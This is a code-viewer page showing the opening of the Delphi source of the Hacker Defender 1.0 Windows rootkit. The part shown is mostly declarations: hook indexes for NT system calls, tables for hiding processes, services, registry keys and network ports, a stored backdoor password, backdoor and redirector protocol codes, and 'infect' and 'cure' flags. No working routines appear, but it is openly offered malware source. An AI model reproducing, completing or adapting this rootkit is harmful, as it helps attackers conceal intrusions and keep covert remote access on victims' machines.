📄 hxdef100.dpr
字号:
program hxdef100;
{ $DEFINE TESTINGTIME}
{ $DEFINE NOSAFEBOOT}
{ $DEFINE NODRIVER}
{ $DEFINE LOGGING}
{$IFNDEF NODRIVER}
{$R driver.res}
{$ENDIF}
{$IFDEF TESTINGTIME}
uses Windows,USysUtils,WinSvc,UJQCompress,UList,UProcAPI;
{$ELSE}
uses Windows,USysUtils,WinSvc,UJQCompress,UList;
{$ENDIF}
const
{$IFDEF LOGGING}
Logging_Level=3;
{$ELSE}
Logging_Level=0;
{$ENDIF}
ServerMailslotNamePart='\\.\mailslot\hxdef-rk100s';
ClientMailslotNamePart='\\.\mailslot\hxdef-rkc';
DriverDeviceName='\\.\HxDefDriver';
SettingsCount=8;
HooksCount=19;//20;//23;
DLLImport=5;
Kernel32Import=22;
AdvapiImport=10;
User32Import=1;
WS2_32Import=12;
{$IFNDEF LOGGING}
NtDLLImport=40;
{$ELSE}
NtDLLImport=41;
HxdefLogFileName='c:\hxdlogex.txt';
{$ENDIF}
TotalImport=Kernel32Import+AdvapiImport+User32Import+WS2_32Import+NtDLLImport;
HackerIdentificator='kernel32.dll'+#00;
FileMappingNameMaxLen=32;
ComSpec='COMSPEC';
HP_ReadFile=0; //0
HP_NtQuerySystemInformation=HP_ReadFile+1; //1
HP_NtResumeThread=HP_NtQuerySystemInformation+3; //4
HP_NtReadVirtualMemory=HP_NtResumeThread+3; //7
HP_NtDeviceIoControlFile=HP_NtReadVirtualMemory+2; //9
HP_NtOpenProcess=HP_NtDeviceIoControlFile+8; //17
HP_NtCreateFile=HP_NtOpenProcess+1; //18
HP_NtNotifyChangeDirectoryFile=HP_NtCreateFile+2; //20
MAILSLOT_TIMEOUT=3000;
MEMORY_BASIC_INFORMATION_SIZE=SizeOf(TMemoryBasicInformation);
ENUM_SERVICE_STATUS_SIZE=SizeOf(TEnumServiceStatus);
ENUM_SERVICE_STATUS_PROCESS_SIZE=SizeOf(TEnumServiceStatus)+8;
STARTUP_INFO_SIZE=$44;
SYSTEM_HANDLE_INFORMATION_SIZE=$10;
SystemProcessesAndThreadsInformation=5;
ObjectNameInformation=1;
FileFsSizeInformation=3;
FileFsFullSizeInformation=7;
ACL_REVISION=$0003;
SECURITY_WORLD_SID_AUTHORITY:TSIDIdentifierAuthority=(Value:(0,0,0,0,0,1));
SECURITY_WORLD_RID:Cardinal=$00000000;
SECURITY_ATTRIBUTES_SIZE=SizeOf(TSecurityAttributes);
C_MEM1 =$0001;
C_MEM2 =$0002;
C_MEM4 =$0004;
C_PREFIX =$0008;
C_67 =$0010;
C_MEM67 =$0020;
C_DATA1 =$0100;
C_DATA2 =$0200;
C_DATA4 =$0400;
C_66 =$1000;
C_DATA66 =$2000;
C_MODRM =$4000;
C_DATAW0 =$8000;
SOCKET_ERROR=-1;
WSA_FLAG_OVERLAPPED=$01;
FIONBIO=$8004667E;
FIONREAD=$4004667F;
AF_INET=2;
IPPROTO_TCP=6;
SOCK_STREAM=1;
SOCK_ADDR_SIZE=16;
FD_READ=$01;
FD_CLOSE=$20;
FD_ALL_EVENTS=$03FF;
WAITFOREVENTSTIMEOUT=250;
WSA_WAIT_TIMEOUT=$00000102;
MIB_TCPROW_SIZE=$14;
MIB_UDPROW_SIZE=$08;
TDI_CONN_IN_SIZE=$18;
TDI_CONN_OUT_FREE_SIZE=$30;
MASTER_KEY_LEN=32;
HOOK_TABLE_ITEM_SIZE=2*8+5; //16 nops and jump
ShortcutCount=5;
FMP_HIDDEN_TABLE =0;
FMP_ROOT_PROCESSES =1;
FMP_HIDDEN_SERVICES =2;
FMP_HIDDEN_REG_KEYS =3;
FMP_HIDDEN_REG_VALUES =4;
FMP_BACKDOOR_PASSWORD =5;
FMP_FREE_SPACE =6;
FMP_HIDDEN_PORTS =7;
RK_RUN_BACKDOOR_REQ =$01;
RK_RUN_BACKDOOR_RES =$02;
RK_REFRESH_SETTINGS =$03;
RK_UNINSTALL =$FE;
RK_DIE =$FF;
BSC_INIT_REQ_1 =$E0;
BSC_INIT_RES_1 =$E1;
BSC_INIT_REQ_2 =$E2;
BSC_INIT_RES_2 =$E3;
BSC_INIT_REQ_3 =$E4;
BSC_INIT_RES_3 =$E5;
BSC_INIT_COMPLETE =$E6;
BSC_CONSOLE_INPUT =$E7;
BSC_CONSOLE_OUTPUT =$E8;
BSC_AUTHORIZATION_OK =$E9;
BSC_AUTHORIZATION_FAILED =$EA;
BSC_SERVICE_BACKDOOR =$EB;
BSC_SERVICE_REDIRECTOR =$EC;
BSC_SERVICE_TEST_REQ =$ED;
BSC_SERVICE_TEST_RES =$EE;
BSC_CTRL_EVENT =$EF;
BSC_END_REQ =$F0;
DOCTOR_INFECT =$00000001;
DOCTOR_CURE =$00000002;
DIRECT_HOOK_HOOK =$00000001;
DIRECT_HOOK_UNHOOK =$00000002;
//we need array of notify information indexed by notification handles
//size of information is 9 * 4 = 36 bytes
//maximum number of handles is 65536 / 4 = 16384
//this mean 589 824 bytes for one process
NOTIFY_TABLE_ENTRY_SIZE =9*4;
NOTIFY_TABLE_SIZE =NOTIFY_TABLE_ENTRY_SIZE*16384;
//we have to set a new timeout value for wait* functions
//because of freeing memory in unhooking process
//all target process threads has to leave all hooked api before freeing memory
NEW_WAIT_TIMEOUT =2500000; //250 ms in 100 nanosec units
type
//THookType=(htNewProcess,htRehook,htExistingProcess);
TStartupFlags=(sfNormal,sfInstallOnly,sfNoService,sfRefresh,sfBackdoor,sfUninstall);
TWindowsVersion=(wvUnknown,wvWin32s,wvWindowsNT40,wvWindows95,wvWindows95OSR2,wvWindows98,wvWindows98SE,wvWindows2000,wvWindowsMe,wvWindowsXP);
TIntercomBuffer=packed record
ID:array[0..3] of Char;
Msg:Byte;
Data1,Data2:Cardinal;
end;
ACE_HEADER=record
AceType:Byte;
AceFlags:Byte;
AceSize:Word;
end;
ACCESS_MASK=DWORD;
ACCESS_ALLOWED_ACE=record
Header:ACE_HEADER;
Mask:ACCESS_MASK;
SidStart:DWORD;
end;
TSocket=Cardinal;
TCharInfoEx=record
case Byte of
0:(UnicodeChar:WCHAR;
UAttributes:Word);
1:(AsciiChar:CHAR;
AAttributes:Word);
end;
TConsoleScreen=array[0..24,0..79] of TCharInfoEx;
TConsoleScreenSmall=record
Chars:array[0..25*80-1] of Char;
Attrs:array[0..25*80-1] of Byte;
end;
TOutputBuffer=record
ConsoleBuffer:TConsoleScreenSmall;
CursorPosition:TCoord;
end;
TInputBuffer=array[0..127] of TInputRecord;
PBackdoorBuffer=^TBackdoorBuffer;
TBackdoorBuffer=packed record
ID:Byte;
Size:Word;
case Byte of
0:(InputBuffer:TInputBuffer);
1:(OutputBuffer:TOutputBuffer);
2:(CtrlType:Cardinal);
3:(Raw:array[0..4000-1] of Char);
end;
PStringListItem=^TStringListItem;
TStringListItem=array[0..255] of Char;
PUnicodeString=^TUnicodeString;
TUnicodeString=packed record
Length,MaximumLength:Word;
Buffer:PWideChar;
end;
PAnsiString=^TAnsiString;
TAnsiString=packed record
Length,MaximumLength:Word;
Buffer:PChar;
end;
TVmCounters=packed record
PeakVirtualSize,VirtualSize:PCardinal;
PageFaultCount:ULONG;
PeakWorkingSetSize,WorkingSetSize,QuotaPeakPagedPoolUsage,QuotaPagedPoolUsage,
QuotaPeakNonPagedPoolUsage,QuotaNonPagedPoolUsage,PagefileUsage,PeakPagefileUsage:PCardinal;
end;
TIoCounters=packed record
ReadOperationCount,WriteOperationCount,OtherOperationCount,ReadTransferCount,
WriteTransferCount,OtherTransferCount:Int64;
end;
TClientId=packed record
UniqueProcess,UniqueThread:Cardinal;
end;
TSystemThreads=packed record
KernelTime,UserTime,CreateTime:Int64;
WaitTime:Cardinal;
StartAddress:Pointer;
ClientId:TClientId;
Priority,BasePriority,ContextSwitchCountState,WaitReason:Cardinal;
end;
PSystemProcesses=^TSystemProcesses;
TSystemProcesses=packed record
NextEntryDelta,ThreadCount:Cardinal;
Reserved1:array[0..5]of Cardinal;
CreateTime,UserTime,KernelTime:Int64;
ProcessName:TUnicodeString;
BasePriority,ProcessId,InheritedFromProcessId,HandleCount:Cardinal;
Reserved2:array[0..1] of Cardinal;
VmCounters:TVmCounters;
IoCounters:TIoCounters;
Threads:array [0..0] of TSystemThreads;
end;
PObjectNameInformation=^TObjectNameInformation;
TObjectNameInformation=packed record
Name:TUnicodeString;
end;
TIoStatusBlock=packed record
case Integer of
0:(Status:Cardinal);
1:(Pointer:Pointer;
Information:PCardinal);
end;
TFileFSSizeInformation=record
TotalAllocationUnits,AvailableAllocationUnits:LARGE_INTEGER;
SectorsPerAllocationUnit,BytesPerSector:Cardinal;
end;
TNtQuerySystemInformation=function(ASystemInformationClass:Cardinal;ASystemInformation:Pointer;
ASystemInformationLength:Cardinal;AReturnLength:PCardinal):Cardinal; stdcall;
TNtLoadDriver=function(ADriverServiceName:PUnicodeString):Cardinal; stdcall;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -